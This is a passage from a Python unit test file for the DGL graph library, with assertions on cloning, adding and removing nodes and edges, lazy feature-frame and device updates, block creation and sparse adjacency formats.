assert g.number_of_edges() == new_g.number_of_edges()
assert g.device == new_g.device
assert g.idtype == new_g.idtype
assert F.array_equal(g.ndata['h'], new_g.ndata['h'])
assert F.array_equal(g.edata['h'], new_g.edata['h'])
# data change
new_g.ndata['h'] = F.copy_to(F.tensor([2, 2, 2], dtype=idtype), ctx=F.ctx())
assert (F.array_equal(g.ndata['h'], new_g.ndata['h']) == False)
g.edata['h'] = F.copy_to(F.tensor([2, 2], dtype=idtype), ctx=F.ctx())
assert (F.array_equal(g.edata['h'], new_g.edata['h']) == False)
# graph structure change
g.add_nodes(1)
assert g.number_of_nodes() != new_g.number_of_nodes()
new_g.add_edges(1, 1)
assert g.number_of_edges() != new_g.number_of_edges()
# zero data graph
g = dgl.graph(([], []), num_nodes=0, idtype=idtype, device=F.ctx())
new_g = g.clone()
assert g.number_of_nodes() == new_g.number_of_nodes()
assert g.number_of_edges() == new_g.number_of_edges()
# heterograph
g = create_test_heterograph3(idtype)
g.edges['plays'].data['h'] = F.copy_to(F.tensor([1, 2, 3, 4], dtype=idtype), ctx=F.ctx())
new_g = g.clone()
assert g.number_of_nodes('user') == new_g.number_of_nodes('user')
assert g.number_of_nodes('game') == new_g.number_of_nodes('game')
assert g.number_of_nodes('developer') == new_g.number_of_nodes('developer')
assert g.number_of_edges('plays') == new_g.number_of_edges('plays')
assert g.number_of_edges('develops') == new_g.number_of_edges('develops')
assert F.array_equal(g.nodes['user'].data['h'], new_g.nodes['user'].data['h'])
assert F.array_equal(g.nodes['game'].data['h'], new_g.nodes['game'].data['h'])
assert F.array_equal(g.edges['plays'].data['h'], new_g.edges['plays'].data['h'])
assert g.device == new_g.device
assert g.idtype == new_g.idtype
u, v = g.edges(form='uv', order='eid', etype='plays')
nu, nv = new_g.edges(form='uv', order='eid', etype='plays')
assert F.array_equal(u, nu)
assert F.array_equal(v, nv)
# graph structure change
u = F.tensor([0, 4], dtype=idtype)
v = F.tensor([2, 6], dtype=idtype)
g.add_edges(u, v, etype='plays')
u, v = g.edges(form='uv', order='eid', etype='plays')
assert u.shape[0] != nu.shape[0]
assert v.shape[0] != nv.shape[0]
assert g.nodes['user'].data['h'].shape[0] != new_g.nodes['user'].data['h'].shape[0]
assert g.nodes['game'].data['h'].shape[0] != new_g.nodes['game'].data['h'].shape[0]
assert g.edges['plays'].data['h'].shape[0] != new_g.edges['plays'].data['h'].shape[0]
@parametrize_dtype
def test_add_edges(idtype):
# homogeneous graph
g = dgl.graph(([0, 1], [1, 2]), idtype=idtype, device=F.ctx())
u = 0
v = 1
g.add_edges(u, v)
assert g.device == F.ctx()
assert g.number_of_nodes() == 3
assert g.number_of_edges() == 3
u = [0]
v = [1]
g.add_edges(u, v)
assert g.device == F.ctx()
assert g.number_of_nodes() == 3
assert g.number_of_edges() == 4
u = F.tensor(u, dtype=idtype)
v = F.tensor(v, dtype=idtype)
g.add_edges(u, v)
assert g.device == F.ctx()
assert g.number_of_nodes() == 3
assert g.number_of_edges() == 5
u, v = g.edges(form='uv', order='eid')
assert F.array_equal(u, F.tensor([0, 1, 0, 0, 0], dtype=idtype))
assert F.array_equal(v, F.tensor([1, 2, 1, 1, 1], dtype=idtype))
# node id larger than current max node id
g = dgl.graph(([0, 1], [1, 2]), idtype=idtype, device=F.ctx())
u = F.tensor([0, 1], dtype=idtype)
v = F.tensor([2, 3], dtype=idtype)
g.add_edges(u, v)
assert g.number_of_nodes() == 4
assert g.number_of_edges() == 4
u, v = g.edges(form='uv', order='eid')
assert F.array_equal(u, F.tensor([0, 1, 0, 1], dtype=idtype))
assert F.array_equal(v, F.tensor([1, 2, 2, 3], dtype=idtype))
# has data
g = dgl.graph(([0, 1], [1, 2]), idtype=idtype, device=F.ctx())
g.ndata['h'] = F.copy_to(F.tensor([1, 1, 1], dtype=idtype), ctx=F.ctx())
g.edata['h'] = F.copy_to(F.tensor([1, 1], dtype=idtype), ctx=F.ctx())
u = F.tensor([0, 1], dtype=idtype)
v = F.tensor([2, 3], dtype=idtype)
e_feat = {'h' : F.copy_to(F.tensor([2, 2], dtype=idtype), ctx=F.ctx()),
'hh' : F.copy_to(F.tensor([2, 2], dtype=idtype), ctx=F.ctx())}
g.add_edges(u, v, e_feat)
assert g.number_of_nodes() == 4
assert g.number_of_edges() == 4
u, v = g.edges(form='uv', order='eid')
assert F.array_equal(u, F.tensor([0, 1, 0, 1], dtype=idtype))
assert F.array_equal(v, F.tensor([1, 2, 2, 3], dtype=idtype))
assert F.array_equal(g.ndata['h'], F.tensor([1, 1, 1, 0], dtype=idtype))
assert F.array_equal(g.edata['h'], F.tensor([1, 1, 2, 2], dtype=idtype))
assert F.array_equal(g.edata['hh'], F.tensor([0, 0, 2, 2], dtype=idtype))
# zero data graph
g = dgl.graph(([], []), num_nodes=0, idtype=idtype, device=F.ctx())
u = F.tensor([0, 1], dtype=idtype)
v = F.tensor([2, 2], dtype=idtype)
e_feat = {'h' : F.copy_to(F.tensor([2, 2], dtype=idtype), ctx=F.ctx()),
'hh' : F.copy_to(F.tensor([2, 2], dtype=idtype), ctx=F.ctx())}
g.add_edges(u, v, e_feat)
assert g.number_of_nodes() == 3
assert g.number_of_edges() == 2
u, v = g.edges(form='uv', order='eid')
assert F.array_equal(u, F.tensor([0, 1], dtype=idtype))
assert F.array_equal(v, F.tensor([2, 2], dtype=idtype))
assert F.array_equal(g.edata['h'], F.tensor([2, 2], dtype=idtype))
assert F.array_equal(g.edata['hh'], F.tensor([2, 2], dtype=idtype))
# bipartite graph
g = dgl.heterograph({('user', 'plays', 'game'): ([0, 1], [1, 2])},
idtype=idtype, device=F.ctx())
u = 0
v = 1
g.add_edges(u, v)
assert g.device == F.ctx()
assert g.number_of_nodes('user') == 2
assert g.number_of_nodes('game') == 3
assert g.number_of_edges() == 3
u = [0]
v = [1]
g.add_edges(u, v)
assert g.device == F.ctx()
assert g.number_of_nodes('user') == 2
assert g.number_of_nodes('game') == 3
assert g.number_of_edges() == 4
u = F.tensor(u, dtype=idtype)
v = F.tensor(v, dtype=idtype)
g.add_edges(u, v)
assert g.device == F.ctx()
assert g.number_of_nodes('user') == 2
assert g.number_of_nodes('game') == 3
assert g.number_of_edges() == 5
u, v = g.edges(form='uv')
assert F.array_equal(u, F.tensor([0, 1, 0, 0, 0], dtype=idtype))
assert F.array_equal(v, F.tensor([1, 2, 1, 1, 1], dtype=idtype))
# node id larger than current max node id
g = dgl.heterograph({('user', 'plays', 'game'): ([0, 1], [1, 2])},
idtype=idtype, device=F.ctx())
u = F.tensor([0, 2], dtype=idtype)
v = F.tensor([2, 3], dtype=idtype)
g.add_edges(u, v)
assert g.device == F.ctx()
assert g.number_of_nodes('user') == 3
assert g.number_of_nodes('game') == 4
assert g.number_of_edges() == 4
u, v = g.edges(form='uv', order='eid')
assert F.array_equal(u, F.tensor([0, 1, 0, 2], dtype=idtype))
assert F.array_equal(v, F.tensor([1, 2, 2, 3], dtype=idtype))
# has data
g = dgl.heterograph({
('user', 'plays', 'game'): ([0, 1], [1, 2])
}, idtype=idtype, device=F.ctx())
g.nodes['user'].data['h'] = F.copy_to(F.tensor([1, 1], dtype=idtype), ctx=F.ctx())
g.nodes['game'].data['h'] = F.copy_to(F.tensor([2, 2, 2], dtype=idtype), ctx=F.ctx())
g.edata['h'] = F.copy_to(F.tensor([1, 1], dtype=idtype), ctx=F.ctx())
u = F.tensor([0, 2], dtype=idtype)
v = F.tensor([2, 3], dtype=idtype)
e_feat = {'h' : F.copy_to(F.tensor([2, 2], dtype=idtype), ctx=F.ctx()),
'hh' : F.copy_to(F.tensor([2, 2], dtype=idtype), ctx=F.ctx())}
g.add_edges(u, v, e_feat)
assert g.number_of_nodes('user') == 3
assert g.number_of_nodes('game') == 4
assert g.number_of_edges() == 4
u, v = g.edges(form='uv', order='eid')
assert F.array_equal(u, F.tensor([0, 1, 0, 2], dtype=idtype))
assert F.array_equal(v, F.tensor([1, 2, 2, 3], dtype=idtype))
assert F.array_equal(g.nodes['user'].data['h'], F.tensor([1, 1, 0], dtype=idtype))
assert F.array_equal(g.nodes['game'].data['h'], F.tensor([2, 2, 2, 0], dtype=idtype))
assert F.array_equal(g.edata['h'], F.tensor([1, 1, 2, 2], dtype=idtype))
assert F.array_equal(g.edata['hh'], F.tensor([0, 0, 2, 2], dtype=idtype))
# heterogeneous graph
g = create_test_heterograph3(idtype)
u = F.tensor([0, 2], dtype=idtype)
v = F.tensor([2, 3], dtype=idtype)
g.add_edges(u, v, etype='plays')
assert g.number_of_nodes('user') == 3
assert g.number_of_nodes('game') == 4
assert g.number_of_nodes('developer') == 2
assert g.number_of_edges('plays') == 6
assert g.number_of_edges('develops') == 2
u, v = g.edges(form='uv', order='eid', etype='plays')
assert F.array_equal(u, F.tensor([0, 1, 1, 2, 0, 2], dtype=idtype))
assert F.array_equal(v, F.tensor([0, 0, 1, 1, 2, 3], dtype=idtype))
assert F.array_equal(g.nodes['user'].data['h'], F.tensor([1, 1, 1], dtype=idtype))
assert F.array_equal(g.nodes['game'].data['h'], F.tensor([2, 2, 0, 0], dtype=idtype))
assert F.array_equal(g.edges['plays'].data['h'], F.tensor([1, 1, 1, 1, 0, 0], dtype=idtype))
# add with feature
e_feat = {'h': F.copy_to(F.tensor([2, 2], dtype=idtype), ctx=F.ctx())}
u = F.tensor([0, 2], dtype=idtype)
v = F.tensor([2, 3], dtype=idtype)
g.nodes['game'].data['h'] = F.copy_to(F.tensor([2, 2, 1, 1], dtype=idtype), ctx=F.ctx())
g.add_edges(u, v, data=e_feat, etype='develops')
assert g.number_of_nodes('user') == 3
assert g.number_of_nodes('game') == 4
assert g.number_of_nodes('developer') == 3
assert g.number_of_edges('plays') == 6
assert g.number_of_edges('develops') == 4
u, v = g.edges(form='uv', order='eid', etype='develops')
assert F.array_equal(u, F.tensor([0, 1, 0, 2], dtype=idtype))
assert F.array_equal(v, F.tensor([0, 1, 2, 3], dtype=idtype))
assert F.array_equal(g.nodes['developer'].data['h'], F.tensor([3, 3, 0], dtype=idtype))
assert F.array_equal(g.nodes['game'].data['h'], F.tensor([2, 2, 1, 1], dtype=idtype))
assert F.array_equal(g.edges['develops'].data['h'], F.tensor([0, 0, 2, 2], dtype=idtype))
@parametrize_dtype
def test_add_nodes(idtype):
# homogeneous Graphs
g = dgl.graph(([0, 1], [1, 2]), idtype=idtype, device=F.ctx())
g.ndata['h'] = F.copy_to(F.tensor([1,1,1], dtype=idtype), ctx=F.ctx())
g.add_nodes(1)
assert g.number_of_nodes() == 4
assert F.array_equal(g.ndata['h'], F.tensor([1, 1, 1, 0], dtype=idtype))
# zero node graph
g = dgl.graph(([], []), num_nodes=3, idtype=idtype, device=F.ctx())
g.ndata['h'] = F.copy_to(F.tensor([1,1,1], dtype=idtype), ctx=F.ctx())
g.add_nodes(1, data={'h' : F.copy_to(F.tensor([2], dtype=idtype), ctx=F.ctx())})
assert g.number_of_nodes() == 4
assert F.array_equal(g.ndata['h'], F.tensor([1, 1, 1, 2], dtype=idtype))
# bipartite graph
g = dgl.heterograph({('user', 'plays', 'game'): ([0, 1], [1, 2])},
idtype=idtype, device=F.ctx())
g.add_nodes(2, data={'h' : F.copy_to(F.tensor([2, 2], dtype=idtype), ctx=F.ctx())}, ntype='user')
assert g.number_of_nodes('user') == 4
assert F.array_equal(g.nodes['user'].data['h'], F.tensor([0, 0, 2, 2], dtype=idtype))
g.add_nodes(2, ntype='game')
assert g.number_of_nodes('game') == 5
# heterogeneous graph
g = create_test_heterograph3(idtype)
g.add_nodes(1, ntype='user')
g.add_nodes(2, data={'h' : F.copy_to(F.tensor([2, 2], dtype=idtype), ctx=F.ctx())}, ntype='game')
g.add_nodes(0, ntype='developer')
assert g.number_of_nodes('user') == 4
assert g.number_of_nodes('game') == 4
assert g.number_of_nodes('developer') == 2
assert F.array_equal(g.nodes['user'].data['h'], F.tensor([1, 1, 1, 0], dtype=idtype))
assert F.array_equal(g.nodes['game'].data['h'], F.tensor([2, 2, 2, 2], dtype=idtype))
@unittest.skipIf(dgl.backend.backend_name == "mxnet", reason="MXNet has error with (0,) shape tensor.")
@parametrize_dtype
def test_remove_edges(idtype):
# homogeneous Graphs
g = dgl.graph(([0, 1], [1, 2]), idtype=idtype, device=F.ctx())
e = 0
g.remove_edges(e)
assert g.number_of_edges() == 1
u, v = g.edges(form='uv', order='eid')
assert F.array_equal(u, F.tensor([1], dtype=idtype))
assert F.array_equal(v, F.tensor([2], dtype=idtype))
g = dgl.graph(([0, 1], [1, 2]), idtype=idtype, device=F.ctx())
e = [0]
g.remove_edges(e)
assert g.number_of_edges() == 1
u, v = g.edges(form='uv', order='eid')
assert F.array_equal(u, F.tensor([1], dtype=idtype))
assert F.array_equal(v, F.tensor([2], dtype=idtype))
e = F.tensor([0], dtype=idtype)
g.remove_edges(e)
assert g.number_of_edges() == 0
# has node data
g = dgl.graph(([0, 1], [1, 2]), idtype=idtype, device=F.ctx())
g.ndata['h'] = F.copy_to(F.tensor([1, 2, 3], dtype=idtype), ctx=F.ctx())
g.remove_edges(1)
assert g.number_of_edges() == 1
assert F.array_equal(g.ndata['h'], F.tensor([1, 2, 3], dtype=idtype))
# has edge data
g = dgl.graph(([0, 1], [1, 2]), idtype=idtype, device=F.ctx())
g.edata['h'] = F.copy_to(F.tensor([1, 2], dtype=idtype), ctx=F.ctx())
g.remove_edges(0)
assert g.number_of_edges() == 1
assert F.array_equal(g.edata['h'], F.tensor([2], dtype=idtype))
# invalid eid
assert_fail = False
try:
g.remove_edges(1)
except:
assert_fail = True
assert assert_fail
# bipartite graph
g = dgl.heterograph({
('user', 'plays', 'game'): ([0, 1], [1, 2])
}, idtype=idtype, device=F.ctx())
e = 0
g.remove_edges(e)
assert g.number_of_edges() == 1
u, v = g.edges(form='uv', order='eid')
assert F.array_equal(u, F.tensor([1], dtype=idtype))
assert F.array_equal(v, F.tensor([2], dtype=idtype))
g = dgl.heterograph(
{('user', 'plays', 'game'): ([0, 1], [1, 2])}, idtype=idtype, device=F.ctx())
e = [0]
g.remove_edges(e)
assert g.number_of_edges() == 1
u, v = g.edges(form='uv', order='eid')
assert F.array_equal(u, F.tensor([1], dtype=idtype))
assert F.array_equal(v, F.tensor([2], dtype=idtype))
e = F.tensor([0], dtype=idtype)
g.remove_edges(e)
assert g.number_of_edges() == 0
# has data
g = dgl.heterograph(
{('user', 'plays', 'game'): ([0, 1], [1, 2])}, idtype=idtype, device=F.ctx())
g.nodes['user'].data['h'] = F.copy_to(F.tensor([1, 1], dtype=idtype), ctx=F.ctx())
g.nodes['game'].data['h'] = F.copy_to(F.tensor([2, 2, 2], dtype=idtype), ctx=F.ctx())
g.edata['h'] = F.copy_to(F.tensor([1, 2], dtype=idtype), ctx=F.ctx())
g.remove_edges(1)
assert g.number_of_edges() == 1
assert F.array_equal(g.nodes['user'].data['h'], F.tensor([1, 1], dtype=idtype))
assert F.array_equal(g.nodes['game'].data['h'], F.tensor([2, 2, 2], dtype=idtype))
assert F.array_equal(g.edata['h'], F.tensor([1], dtype=idtype))
# heterogeneous graph
g = create_test_heterograph3(idtype)
g.edges['plays'].data['h'] = F.copy_to(F.tensor([1, 2, 3, 4], dtype=idtype), ctx=F.ctx())
g.remove_edges(1, etype='plays')
assert g.number_of_edges('plays') == 3
u, v = g.edges(form='uv', order='eid', etype='plays')
assert F.array_equal(u, F.tensor([0, 1, 2], dtype=idtype))
assert F.array_equal(v, F.tensor([0, 1, 1], dtype=idtype))
assert F.array_equal(g.edges['plays'].data['h'], F.tensor([1, 3, 4], dtype=idtype))
# remove all edges of 'develops'
g.remove_edges([0, 1], etype='develops')
assert g.number_of_edges('develops') == 0
assert F.array_equal(g.nodes['user'].data['h'], F.tensor([1, 1, 1], dtype=idtype))
assert F.array_equal(g.nodes['game'].data['h'], F.tensor([2, 2], dtype=idtype))
assert F.array_equal(g.nodes['developer'].data['h'], F.tensor([3, 3], dtype=idtype))
@parametrize_dtype
def test_remove_nodes(idtype):
# homogeneous Graphs
g = dgl.graph(([0, 1], [1, 2]), idtype=idtype, device=F.ctx())
n = 0
g.remove_nodes(n)
assert g.number_of_nodes() == 2
assert g.number_of_edges() == 1
u, v = g.edges(form='uv', order='eid')
assert F.array_equal(u, F.tensor([0], dtype=idtype))
assert F.array_equal(v, F.tensor([1], dtype=idtype))
g = dgl.graph(([0, 1], [1, 2]), idtype=idtype, device=F.ctx())
n = [1]
g.remove_nodes(n)
assert g.number_of_nodes() == 2
assert g.number_of_edges() == 0
g = dgl.graph(([0, 1], [1, 2]), idtype=idtype, device=F.ctx())
n = F.tensor([2], dtype=idtype)
g.remove_nodes(n)
assert g.number_of_nodes() == 2
assert g.number_of_edges() == 1
u, v = g.edges(form='uv', order='eid')
assert F.array_equal(u, F.tensor([0], dtype=idtype))
assert F.array_equal(v, F.tensor([1], dtype=idtype))
# invalid nid
assert_fail = False
try:
g.remove_nodes(3)
except:
assert_fail = True
assert assert_fail
# has node and edge data
g = dgl.graph(([0, 0, 2], [0, 1, 2]), idtype=idtype, device=F.ctx())
g.ndata['hv'] = F.copy_to(F.tensor([1, 2, 3], dtype=idtype), ctx=F.ctx())
g.edata['he'] = F.copy_to(F.tensor([1, 2, 3], dtype=idtype), ctx=F.ctx())
g.remove_nodes(F.tensor([0], dtype=idtype))
assert g.number_of_nodes() == 2
assert g.number_of_edges() == 1
u, v = g.edges(form='uv', order='eid')
assert F.array_equal(u, F.tensor([1], dtype=idtype))
assert F.array_equal(v, F.tensor([1], dtype=idtype))
assert F.array_equal(g.ndata['hv'], F.tensor([2, 3], dtype=idtype))
assert F.array_equal(g.edata['he'], F.tensor([3], dtype=idtype))
# node id larger than current max node id
g = dgl.heterograph(
{('user', 'plays', 'game'): ([0, 1], [1, 2])}, idtype=idtype, device=F.ctx())
n = 0
g.remove_nodes(n, ntype='user')
assert g.number_of_nodes('user') == 1
assert g.number_of_nodes('game') == 3
assert g.number_of_edges() == 1
u, v = g.edges(form='uv', order='eid')
assert F.array_equal(u, F.tensor([0], dtype=idtype))
assert F.array_equal(v, F.tensor([2], dtype=idtype))
g = dgl.heterograph(
{('user', 'plays', 'game'): ([0, 1], [1, 2])}, idtype=idtype, device=F.ctx())
n = [1]
g.remove_nodes(n, ntype='user')
assert g.number_of_nodes('user') == 1
assert g.number_of_nodes('game') == 3
assert g.number_of_edges() == 1
u, v = g.edges(form='uv', order='eid')
assert F.array_equal(u, F.tensor([0], dtype=idtype))
assert F.array_equal(v, F.tensor([1], dtype=idtype))
g = dgl.heterograph(
{('user', 'plays', 'game'): ([0, 1], [1, 2])}, idtype=idtype, device=F.ctx())
n = F.tensor([0], dtype=idtype)
g.remove_nodes(n, ntype='game')
assert g.number_of_nodes('user') == 2
assert g.number_of_nodes('game') == 2
assert g.number_of_edges() == 2
u, v = g.edges(form='uv', order='eid')
assert F.array_equal(u, F.tensor([0, 1], dtype=idtype))
assert F.array_equal(v, F.tensor([0 ,1], dtype=idtype))
# heterogeneous graph
g = create_test_heterograph3(idtype)
g.edges['plays'].data['h'] = F.copy_to(F.tensor([1, 2, 3, 4], dtype=idtype), ctx=F.ctx())
g.remove_nodes(0, ntype='game')
assert g.number_of_nodes('user') == 3
assert g.number_of_nodes('game') == 1
assert g.number_of_nodes('developer') == 2
assert g.number_of_edges('plays') == 2
assert g.number_of_edges('develops') == 1
assert F.array_equal(g.nodes['user'].data['h'], F.tensor([1, 1, 1], dtype=idtype))
assert F.array_equal(g.nodes['game'].data['h'], F.tensor([2], dtype=idtype))
assert F.array_equal(g.nodes['developer'].data['h'], F.tensor([3, 3], dtype=idtype))
u, v = g.edges(form='uv', order='eid', etype='plays')
assert F.array_equal(u, F.tensor([1, 2], dtype=idtype))
assert F.array_equal(v, F.tensor([0, 0], dtype=idtype))
assert F.array_equal(g.edges['plays'].data['h'], F.tensor([3, 4], dtype=idtype))
u, v = g.edges(form='uv', order='eid', etype='develops')
assert F.array_equal(u, F.tensor([1], dtype=idtype))
assert F.array_equal(v, F.tensor([0], dtype=idtype))
@parametrize_dtype
def test_frame(idtype):
g = dgl.graph(([0, 1, 2], [1, 2, 3]), idtype=idtype, device=F.ctx())
g.ndata['h'] = F.copy_to(F.tensor([0, 1, 2, 3], dtype=idtype), ctx=F.ctx())
g.edata['h'] = F.copy_to(F.tensor([0, 1, 2], dtype=idtype), ctx=F.ctx())
# remove nodes
sg = dgl.remove_nodes(g, [3])
# check for lazy update
assert F.array_equal(sg._node_frames[0]._columns['h'].storage, g.ndata['h'])
assert F.array_equal(sg._edge_frames[0]._columns['h'].storage, g.edata['h'])
assert sg.ndata['h'].shape[0] == 3
assert sg.edata['h'].shape[0] == 2
# update after read
assert F.array_equal(sg._node_frames[0]._columns['h'].storage, F.tensor([0, 1, 2], dtype=idtype))
assert F.array_equal(sg._edge_frames[0]._columns['h'].storage, F.tensor([0, 1], dtype=idtype))
ng = dgl.add_nodes(sg, 1)
assert ng.ndata['h'].shape[0] == 4
assert F.array_equal(ng._node_frames[0]._columns['h'].storage, F.tensor([0, 1, 2, 0], dtype=idtype))
ng = dgl.add_edges(ng, [3], [1])
assert ng.edata['h'].shape[0] == 3
assert F.array_equal(ng._edge_frames[0]._columns['h'].storage, F.tensor([0, 1, 0], dtype=idtype))
# multi level lazy update
sg = dgl.remove_nodes(g, [3])
assert F.array_equal(sg._node_frames[0]._columns['h'].storage, g.ndata['h'])
assert F.array_equal(sg._edge_frames[0]._columns['h'].storage, g.edata['h'])
ssg = dgl.remove_nodes(sg, [1])
assert F.array_equal(ssg._node_frames[0]._columns['h'].storage, g.ndata['h'])
assert F.array_equal(ssg._edge_frames[0]._columns['h'].storage, g.edata['h'])
# ssg is changed
assert ssg.ndata['h'].shape[0] == 2
assert ssg.edata['h'].shape[0] == 0
assert F.array_equal(ssg._node_frames[0]._columns['h'].storage, F.tensor([0, 2], dtype=idtype))
# sg still in lazy model
assert F.array_equal(sg._node_frames[0]._columns['h'].storage, g.ndata['h'])
assert F.array_equal(sg._edge_frames[0]._columns['h'].storage, g.edata['h'])
@unittest.skipIf(dgl.backend.backend_name == "tensorflow", reason="TensorFlow always create a new tensor")
@unittest.skipIf(F._default_context_str == 'cpu', reason="cpu do not have context change problem")
@parametrize_dtype
def test_frame_device(idtype):
g = dgl.graph(([0,1,2], [2,3,1]))
g.ndata['h'] = F.copy_to(F.tensor([1,1,1,2], dtype=idtype), ctx=F.cpu())
g.ndata['hh'] = F.copy_to(F.ones((4,3), dtype=idtype), ctx=F.cpu())
g.edata['h'] = F.copy_to(F.tensor([1,2,3], dtype=idtype), ctx=F.cpu())
g = g.to(F.ctx())
# lazy device copy
assert F.context(g._node_frames[0]._columns['h'].storage) == F.cpu()
assert F.context(g._node_frames[0]._columns['hh'].storage) == F.cpu()
print(g.ndata['h'])
assert F.context(g._node_frames[0]._columns['h'].storage) == F.ctx()
assert F.context(g._node_frames[0]._columns['hh'].storage) == F.cpu()
assert F.context(g._edge_frames[0]._columns['h'].storage) == F.cpu()
# lazy device copy in subgraph
sg = dgl.node_subgraph(g, [0,1,2])
assert F.context(sg._node_frames[0]._columns['h'].storage) == F.ctx()
assert F.context(sg._node_frames[0]._columns['hh'].storage) == F.cpu()
assert F.context(sg._edge_frames[0]._columns['h'].storage) == F.cpu()
print(sg.ndata['hh'])
assert F.context(sg._node_frames[0]._columns['hh'].storage) == F.ctx()
assert F.context(sg._edge_frames[0]._columns['h'].storage) == F.cpu()
# back to cpu
sg = sg.to(F.cpu())
assert F.context(sg._node_frames[0]._columns['h'].storage) == F.ctx()
assert F.context(sg._node_frames[0]._columns['hh'].storage) == F.ctx()
assert F.context(sg._edge_frames[0]._columns['h'].storage) == F.cpu()
print(sg.ndata['h'])
print(sg.ndata['hh'])
print(sg.edata['h'])
assert F.context(sg._node_frames[0]._columns['h'].storage) == F.cpu()
assert F.context(sg._node_frames[0]._columns['hh'].storage) == F.cpu()
assert F.context(sg._edge_frames[0]._columns['h'].storage) == F.cpu()
# set some field
sg = sg.to(F.ctx())
assert F.context(sg._node_frames[0]._columns['h'].storage) == F.cpu()
sg.ndata['h'][0] = 5
assert F.context(sg._node_frames[0]._columns['h'].storage) == F.ctx()
assert F.context(sg._node_frames[0]._columns['hh'].storage) == F.cpu()
assert F.context(sg._edge_frames[0]._columns['h'].storage) == F.cpu()
# add nodes
ng = dgl.add_nodes(sg, 3)
assert F.context(ng._node_frames[0]._columns['h'].storage) == F.ctx()
assert F.context(ng._node_frames[0]._columns['hh'].storage) == F.ctx()
assert F.context(ng._edge_frames[0]._columns['h'].storage) == F.cpu()
@parametrize_dtype
def test_create_block(idtype):
block = dgl.create_block(([0, 1, 2], [1, 2, 3]), idtype=idtype, device=F.ctx())
assert block.num_src_nodes() == 3
assert block.num_dst_nodes() == 4
assert block.num_edges() == 3
block = dgl.create_block(([], []), idtype=idtype, device=F.ctx())
assert block.num_src_nodes() == 0
assert block.num_dst_nodes() == 0
assert block.num_edges() == 0
block = dgl.create_block(([], []), 3, 4, idtype=idtype, device=F.ctx())
assert block.num_src_nodes() == 3
assert block.num_dst_nodes() == 4
assert block.num_edges() == 0
block = dgl.create_block(([0, 1, 2], [1, 2, 3]), 4, 5, idtype=idtype, device=F.ctx())
assert block.num_src_nodes() == 4
assert block.num_dst_nodes() == 5
assert block.num_edges() == 3
sx = F.randn((4, 5))
dx = F.randn((5, 6))
ex = F.randn((3, 4))
block.srcdata['x'] = sx
block.dstdata['x'] = dx
block.edata['x'] = ex
g = dgl.block_to_graph(block)
assert g.num_src_nodes() == 4
assert g.num_dst_nodes() == 5
assert g.num_edges() == 3
assert g.srcdata['x'] is sx
assert g.dstdata['x'] is dx
assert g.edata['x'] is ex
block = dgl.create_block({
('A', 'AB', 'B'): ([1, 2, 3], [2, 1, 0]),
('B', 'BA', 'A'): ([2, 3], [3, 4])},
idtype=idtype, device=F.ctx())
assert block.num_src_nodes('A') == 4
assert block.num_src_nodes('B') == 4
assert block.num_dst_nodes('B') == 3
assert block.num_dst_nodes('A') == 5
assert block.num_edges('AB') == 3
assert block.num_edges('BA') == 2
block = dgl.create_block({
('A', 'AB', 'B'): ([], []),
('B', 'BA', 'A'): ([], [])},
idtype=idtype, device=F.ctx())
assert block.num_src_nodes('A') == 0
assert block.num_src_nodes('B') == 0
assert block.num_dst_nodes('B') == 0
assert block.num_dst_nodes('A') == 0
assert block.num_edges('AB') == 0
assert block.num_edges('BA') == 0
block = dgl.create_block({
('A', 'AB', 'B'): ([], []),
('B', 'BA', 'A'): ([], [])},
num_src_nodes={'A': 5, 'B': 5},
num_dst_nodes={'A': 6, 'B': 4},
idtype=idtype, device=F.ctx())
assert block.num_src_nodes('A') == 5
assert block.num_src_nodes('B') == 5
assert block.num_dst_nodes('B') == 4
assert block.num_dst_nodes('A') == 6
assert block.num_edges('AB') == 0
assert block.num_edges('BA') == 0
block = dgl.create_block({
('A', 'AB', 'B'): ([1, 2, 3], [2, 1, 0]),
('B', 'BA', 'A'): ([2, 3], [3, 4])},
num_src_nodes={'A': 5, 'B': 5},
num_dst_nodes={'A': 6, 'B': 4},
idtype=idtype, device=F.ctx())
assert block.num_src_nodes('A') == 5
assert block.num_src_nodes('B') == 5
assert block.num_dst_nodes('B') == 4
assert block.num_dst_nodes('A') == 6
assert block.num_edges(('A', 'AB', 'B')) == 3
assert block.num_edges(('B', 'BA', 'A')) == 2
sax = F.randn((5, 3))
sbx = F.randn((5, 4))
dax = F.randn((6, 5))
dbx = F.randn((4, 6))
eabx = F.randn((3, 7))
ebax = F.randn((2, 8))
block.srcnodes['A'].data['x'] = sax
block.srcnodes['B'].data['x'] = sbx
block.dstnodes['A'].data['x'] = dax
block.dstnodes['B'].data['x'] = dbx
block.edges['AB'].data['x'] = eabx
block.edges['BA'].data['x'] = ebax
hg = dgl.block_to_graph(block)
assert hg.num_nodes('A_src') == 5
assert hg.num_nodes('B_src') == 5
assert hg.num_nodes('A_dst') == 6
assert hg.num_nodes('B_dst') == 4
assert hg.num_edges(('A_src', 'AB', 'B_dst')) == 3
assert hg.num_edges(('B_src', 'BA', 'A_dst')) == 2
assert hg.nodes['A_src'].data['x'] is sax
assert hg.nodes['B_src'].data['x'] is sbx
assert hg.nodes['A_dst'].data['x'] is dax
assert hg.nodes['B_dst'].data['x'] is dbx
assert hg.edges['AB'].data['x'] is eabx
assert hg.edges['BA'].data['x'] is ebax
@parametrize_dtype
@pytest.mark.parametrize('fmt', ['coo', 'csr', 'csc'])
def test_adj_sparse(idtype, fmt):
if fmt == 'coo':
A = ssp.random(10, 10, 0.2).tocoo()
A.data = np.arange(20)
row = F.tensor(A.row, idtype)
col = F.tensor(A.col, idtype)
g = dgl.graph((row, col))
elif fmt == 'csr':
A = ssp.random(10, 10, 0.2).tocsr()
A.data = np.arange(20)
indptr = F.tensor(A.indptr, idtype)
indices = F.tensor(A.indices, idtype)
g = dgl.graph(('csr', (indptr, indices, [])))
with pytest.raises(DGLError):
g2 = dgl.graph(('csr', (indptr[:-1], indices, [])), num_nodes=10)
elif fmt == 'csc':
A = ssp.random(10, 10, 0.2).tocsc()
A.data = np.arange(20)
indptr = F.tensor(A.indptr, idtype)
indices = F.tensor(A.indices, idtype)
g = dgl.graph(('csc', (indptr, indices, [])))
with pytest.raises(DGLError):
g2 = dgl.graph(('csr', (indptr[:-1], indices, [])), num_nodes=10)
A_coo = A.tocoo()
A_csr = A.tocsr()
A_csc = A.tocsc()
row, col = g.adj_sparse('coo')
assert np.array_equal(F.asnumpy(row), A_coo.row)
assert np.array_equal(F.asnumpy(col), A_coo.col)
indptr, indices, eids = g.adj_sparse('csr')
assert np.array_equal(F.asnumpy(indptr), A_csr.indptr)
if fmt == 'csr':
assert len(eids) == 0
